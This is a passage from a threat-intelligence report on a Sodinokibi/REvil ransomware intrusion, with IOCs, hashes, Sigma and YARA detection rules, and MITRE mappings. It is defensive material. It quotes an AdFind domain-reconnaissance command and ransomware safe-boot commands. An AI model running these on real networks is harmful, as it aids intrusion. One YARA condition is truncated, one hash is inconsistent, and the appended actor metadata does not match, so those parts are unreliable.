27\n\nIOCs\r\nNetwork\r\n45.86.163.78|80\r\n45.86.163.78|443\r\n45.86.163.78|8080\r\n195.189.99.74|80\r\n195.189.99.74|443\r\n195.189.99.74|8080\r\n206.189.10.247|80\r\n161.35.109.168|443\r\nsmalleststores.com\r\ncloudmetric.online\r\ncikawemoret34.space\r\nnomovee.website\r\nFile\r\nskull-x64.dat\r\n5c3a6978bb960d8fbccd117ddcc3ca10\r\n17424cfeb756e231bea6d1363151a83af142ba6f\r\n59a2a5fae1c51afbbf1b8c6eb0a65cb2b8575794e3890f499f8935035e633fc\r\nCiocca.dll\r\n296f1098a3a8cfb7e07808ee08361495\r\n7d903f87fd305f1c93ec420848fd6e5aeb018d59\r\nb1b00f7b065e8c013e0c23c0f34707819e0d537dbe2e83d0d023a11a0ca6b388\r\nlicense.dat\r\n6f208841cfd819c29a7cbc0a202bd7a3\r\n0febc376cc066bb668f1a80b969ed112da8e871c\r\n45b6349ee9d53278f350b59d4a2a28890bbe9f9de6565453db4c085bb5875865\r\nDomainName.dll\r\nc8fab46c4fd61c5f138fb151638c35e1\r\nc4830cbf3a3044f6e50cd60127ff5681f8ee4bbf\r\n64076294e761cee0ce7d7cd28dae05f483a711eafe47f94fe881ac3980abfd8f\r\nDomainName.exe\r\naf94ccb62f97700115a219c4b7626d22\r\nbb67edcfe4e5b6fe09ee96e5b8ace7a4cfe39eb7\r\n2896b38ec3f5f196a9d127dbda3f44c7c29c844f53ae5f209229d56fd6f2a59c\r\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 23 of 27\n\nsvchost.exe (rclone)\r\nfcfcf1e45e8d5cdca0450b8dc90754b68e8e4673\r\n538078ab6d80d7cf889af3e08f62c4e83358596f31ac8ae8fbc6326839a6bfe5\r\nAdFind.exe\r\ncb198869ca3c96af536869e71c54dd9d83afbee6\r\n56de41fa0a94fa7fff68f02712a698ba2f0a71afcecb217f6519bd5751baf3ed\r\nDetections\r\nNetwork\r\nETPRO TROJAN Cobalt Strike Malleable C2 JQuery Custom Profile M2\r\nET DNS Query to a *.top domain\r\nET POLICY OpenSSL Demo CA - Internet Widgits Pty\r\nSigma\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_susp_powershell_enc_cmd.yml\r\nhttps://github.com/Neo23x0/sigma/blob/084cd39505861188d9d8f2d5c0f2835e4f750a3f/rules/windows/process_creation/win_malware_trickbot_r\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_susp_commands_recon_activity.yml\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/network_connection/sysmon_rundll32_net_connections.yml\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_adfind.yml\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_wmi_execution.yml\r\nhttps://github.com/SigmaHQ/sigma/blob/a08571be9107d1c0e216400ffbb89c394fcd2570/rules/windows/process_creation/win_office_shell.yml\r\nCustom rule thanks to @0xThiebaut\r\ntitle: Sodinokibi Ransomware Registry Key\r\nid: 9fecd354-77f0-498e-a611-c963970e7bca\r\ndescription: Detects the creation of Sodinokibi (aka REvil) registry keys\r\nstatus: experimental\r\nreferences:\r\n- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\n- https://twitter.com/malwrhunterteam/status/1372648463553462279\r\ntags:\r\n- attack.persistence\r\n- attack.t1547.001\r\ndate: 2021/03/29\r\nauthor: Maxime THIEBAUT (@0xThiebaut)\r\nlogsource:\r\ncategory: registry_event\r\nproduct: windows\r\ndetection:\r\nselection:\r\nTargetObject|contains:\r\n- '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\*AstraZeneca'\r\n- '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\*franceisshit'\r\ncondition: selection\r\nlevel: high\r\nCustom rule thanks to @lindodapoet_\r\ntitle: Svchost data exfiltration\r\nid: dc4249c9-d96f-401b-a92b-caa6208c097d\r\nstatus: experimental\r\ndescription: Detects possible data exfiltration via svchost\r\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 24 of 27\n\nreferences:\r\n- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nauthor: Nclose\r\ndate: 2021/03/29\r\ntags:\r\n- attack.exfiltration\r\n- attack.t1048\r\nlogsource:\r\nproduct: windows\r\nservice: process_creation\r\ndetection:\r\nselection:\r\nCommandLine|contains: 'copy'\r\nImage|endswith: '\\svchost.exe'\r\ncondition: selection\r\nfalsepositives:\r\n- Unknown\r\nlevel: high\r\nCustom rules and rule ideas written by @BlackMatter23\r\nYara\r\n/*\r\nYARA Rule Set\r\nAuthor: The DFIR Report\r\nDate: 2021-03-29\r\nIdentifier: files\r\nReference: https://thedfirreport.com/\r\n*/\r\n/* Rule Set ----------------------------------------------------------------- */\r\nimport \"pe\"\r\nrule Sodinokibi_032021 {\r\nmeta:\r\ndescription = \"files - file DomainName.exe\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com/\"\r\ndate = \"2021-03-21\"\r\nhash1 = \"2896b38ec3f5f196a9d127dbda3f44c7c29c844f53ae5f209229d56fd6f2a59c\"\r\nstrings:\r\n$s1 = \"vmcompute.exe\" fullword wide\r\n$s2 = \"vmwp.exe\" fullword wide\r\n$s3 = \"bootcfg /raw /a /safeboot:network /id 1\" fullword ascii\r\n$s4 = \"bcdedit /set {current} safeboot network\" fullword ascii\r\n$s5 = \"7+a@P\u003e:N:0!F$%I-6MBEFb M\" fullword ascii\r\n$s6 = \"jg:\\\"\\\\0=Z\" fullword ascii\r\n$s7 = \"ERR0R D0UBLE RUN!\" fullword wide\r\n$s8 = \"VVVVVPQ\" fullword ascii\r\n$s9 = \"VVVVVWQ\" fullword ascii\r\n$s10 = \"Running\" fullword wide /* Goodware String - occured 159 times */\r\n$s11 = \"expand 32-byte kexpand 16-byte k\" fullword ascii\r\n$s12 = \"9RFIT\\\"\u0026\" fullword ascii\r\n$s13 = \"jZXVf9F\" fullword ascii\r\n$s14 = \"tCWWWhS=@\" fullword ascii\r\n$s15 = \"vmms.exe\" fullword wide /* Goodware String - occured 1 times */\r\n$s16 = \"JJwK9Zl\" fullword ascii\r\n$s17 = \"KkT37uf4nNh2PqUDwZqxcHUMVV3yBwSHO#K\" fullword ascii\r\n$s18 = \"0*090}0\" fullword ascii /* Goodware String - occured 1 times */\r\n$s19 = \"5)5I5a5\" fullword ascii /* Goodware String - occured 1 times */\r\n$s20 = \"7-7H7c7\" fullword ascii /* Goodware String - occured 1 times */\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 400KB and\r\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 25 of 27\n\n( pe.imphash() == \"031931d2f2d921a9d906454d42f21be0\" or 8 of them )\r\n}\r\nrule icedid_032021_1 {\r\nmeta:\r\ndescription = \"files - file skull-x64.dat\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com/\"\r\ndate = \"2021-03-21\"\r\nhash1 = \"59a2a5fae1c51afbbf1bf8c6eb0a65cb2b8575794e3890f499f8935035e633fc\"\r\nstrings:\r\n$s1 = \"update\" fullword ascii /* Goodware String - occured 207 times */\r\n$s2 = \"PstmStr\" fullword ascii\r\n$s3 = \"mRsx0k/\" fullword wide\r\n$s4 = \"D$0lzK\" fullword ascii\r\n$s5 = \"A;Zts}H\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 100KB and\r\n( pe.imphash() == \"67a065c05a359d287f1fed9e91f823d5\" and ( pe.exports(\"PstmStr\") and pe.exports(\"update\") ) or\r\n}\r\nrule icedid_032021_2 {\r\nmeta:\r\ndescription = \"1 - file license.dat\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com/\"\r\ndate = \"2021-03-21\"\r\nhash1 = \"45b6349ee9d53278f350b59d4a2a28890bbe9f9de6565453db4c085bb5875865\"\r\nstrings:\r\n$s1 = \"+ M:{`n-\" fullword ascii\r\n$s2 = \"kwzzdd\" fullword ascii\r\n$s3 = \"w5O- \u003ez\" fullword ascii\r\n$s4 = \"RRlK8n@~\" fullword ascii\r\n$s5 = \"aQXDUkBC\" fullword ascii\r\n$s6 = \"}i.ZSj*\" fullword ascii\r\n$s7 = \"kLeSM?\" fullword ascii\r\n$s8 = \"qmnIqD\\\")P\" fullword ascii\r\n$s9 = \"aFAeU!,\" fullword ascii\r\n$s10 = \"Qjrf\\\"Q\" fullword ascii\r\n$s11 = \"PTpc,!P#\" fullword ascii\r\n$s12 = \"r@|JZOkfmT2\" fullword ascii\r\n$s13 = \"aPvBO,4\" fullword ascii\r\n$s14 = \"\u003efdFhl^S8Z\" fullword ascii\r\n$s15 = \"[syBE0\\\\\" fullword ascii\r\n$s16 = \"`YFOr.JH\" fullword ascii\r\n$s17 = \"C6ZVVF j7}\" fullword ascii\r\n$s18 = \"LPlagce\" fullword ascii\r\n$s19 = \"NLeF_-e`\" fullword ascii\r\n$s20 = \"HRRF|}O\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x43da and filesize \u003c 1000KB and\r\n8 of them\r\n}\r\nMITRE\r\nSpearphishing Attachment - T1566.001\r\nUser Execution - T1204\r\nWindows Management Instrumentation - T1047\r\nProcess Injection - T1055\r\nDomain Trust Discovery - T1482\r\nDomain Account - T1087.002\r\nSystem Information Discovery - T1082\r\nSystem Network Configuration Discovery - T1016\r\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 26 of 27\n\nSecurity Software Discovery - T1518.001\r\nSMB/Windows Admin Shares - T1021.002\r\nRemote Desktop Protocol - T1021.001\r\nCommonly Used Port - T1043\r\nApplication Layer Protocol - T1071\r\nExfiltration Over Asymmetric Encrypted Non-C2 Protocol - T1048.002\r\nData Encrypted for Impact - T1486\r\nMalicious File - T1204.002\r\nCommand and Scripting Interpreter - T1059\r\nPowerShell - T1059.001\r\nScheduled Task - T1053.005\r\nRemote System Discovery - T1018\r\nRundll32 - T1218.011\r\nInternal case # 1051\r\nSource: https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 27 of 27\n\n https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/   \ncmd.exe /C adfind.exe -f objectcategory=computer -csv name cn OperatingSystem dNSHostName \u003e some.csv\nLateral Movement    \nFor lateral movement, the threat actors used various techniques across the domain, one method being Cobalt Strike.\n  Page 11 of 27",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/"
	],
	"report_names": [
		"sodinokibi-aka-revil-ransomware"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434361,
	"ts_updated_at": 1775826726,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a630fbe16b63a3f1fc42a0254abc5e2b81238415.pdf",
		"text": "https://archive.orkl.eu/a630fbe16b63a3f1fc42a0254abc5e2b81238415.txt",
		"img": "https://archive.orkl.eu/a630fbe16b63a3f1fc42a0254abc5e2b81238415.jpg"
	}
}